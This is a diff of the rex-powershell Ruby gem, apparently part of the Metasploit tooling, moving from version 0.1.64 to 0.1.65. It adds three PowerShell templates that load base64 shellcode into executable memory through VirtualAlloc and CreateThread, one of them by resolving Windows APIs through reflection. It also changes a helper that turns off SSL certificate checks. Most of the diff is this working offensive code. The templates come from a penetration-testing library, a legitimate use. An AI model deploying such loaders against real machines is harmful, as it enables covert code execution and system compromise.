rex-powershell 0.1.64 → 0.1.65

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 123f979273d36465cc7f47e1462b25d6a1c0d677
-  data.tar.gz: b4586b04b40fa4d266bf2078c9218d57a1d14afb
+  metadata.gz: 7822116e9e48c0d7ee82d13dac3ca52079e470ba
+  data.tar.gz: c950c71437f158f5fca8bd307671b04812619b34
 SHA512:
-  metadata.gz: dd7fa225daf345de60e792631ae08d14a328d395dae0b8335d31b01e2a2bafd7d3603b89745c2456e5947ec33beb0e5e9daccf3e0f9b3f172c65705c71627064
-  data.tar.gz: a582bbca67731113fb91dc7efb929a4fe76dd31ff475c38ce52bc32ec61baf402858d3d60e691ca6349d94da37390ebbba82f2f0b3110850d3bdef582872e166
+  metadata.gz: b9846114f3bb39ecd7dd3a5ab424918ddd1d974c59c4939173a514d213b0b1cc30a6040d63cab575f1f14b62665e8311c18f79ccef14be98fcc10c81f1221c1d
+  data.tar.gz: 3f69f77edd8116afeb60279c2e95de5a1d6a8ad685f58688519ec41be9f231600a821ee15637d155cf607e4b9ba3165b30f1c938e5d639e4a48b8de95ebb2bc7

data/data/templates/to_mem_dotnet.ps1.template

@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

data/data/templates/to_mem_old.ps1.template

@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

data/data/templates/to_mem_pshreflection.ps1.template

@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+	
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+	
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+		
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null

data/lib/rex/powershell.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/powershell/version'
+require 'rex/powershell/templates'
 require 'rex/powershell/payload'
 require 'rex/powershell/output'
 require 'rex/powershell/parser'

data/lib/rex/powershell/psh_methods.rb

@@ -70,7 +70,7 @@ module Powershell
     # @return [String] Powershell code to disable SSL verification
     #   checks.
     def self.ignore_ssl_certificate
-      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
+      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
     end
 
     #

data/lib/rex/powershell/templates.rb

@@ -0,0 +1,19 @@
+module Rex
+  module Powershell
+    module Templates
+
+      # The base directory that all Powershell script templates live in
+      TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
+
+      # The powershell script template for memory injection using .NET
+      TO_MEM_DOTNET = File.join(TEMPLATE_DIR, 'to_mem_dotnet.ps1.template')
+
+      # The powershell script template for memory injection using reflection
+      TO_MEM_REFLECTION = File.join(TEMPLATE_DIR, 'to_mem_pshreflection.ps1.template')
+
+      # The powershell script template for memory injection using the old method
+      TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
+
+    end
+  end
+end

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.64"
+    VERSION = "0.1.65"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.64
+  version: 0.1.65
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney
@@ -85,7 +85,7 @@ cert_chain:
   2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
   QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
   -----END CERTIFICATE-----
-date: 2016-08-25 00:00:00.000000000 Z
+date: 2016-10-03 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler
@@ -175,6 +175,9 @@ files:
 - Rakefile
 - bin/console
 - bin/setup
+- data/templates/to_mem_dotnet.ps1.template
+- data/templates/to_mem_old.ps1.template
+- data/templates/to_mem_pshreflection.ps1.template
 - lib/rex/powershell.rb
 - lib/rex/powershell/command.rb
 - lib/rex/powershell/function.rb
@@ -185,6 +188,7 @@ files:
 - lib/rex/powershell/payload.rb
 - lib/rex/powershell/psh_methods.rb
 - lib/rex/powershell/script.rb
+- lib/rex/powershell/templates.rb
 - lib/rex/powershell/version.rb
 - rex-powershell.gemspec
 homepage: https://github.com/rapid7/rex-powershell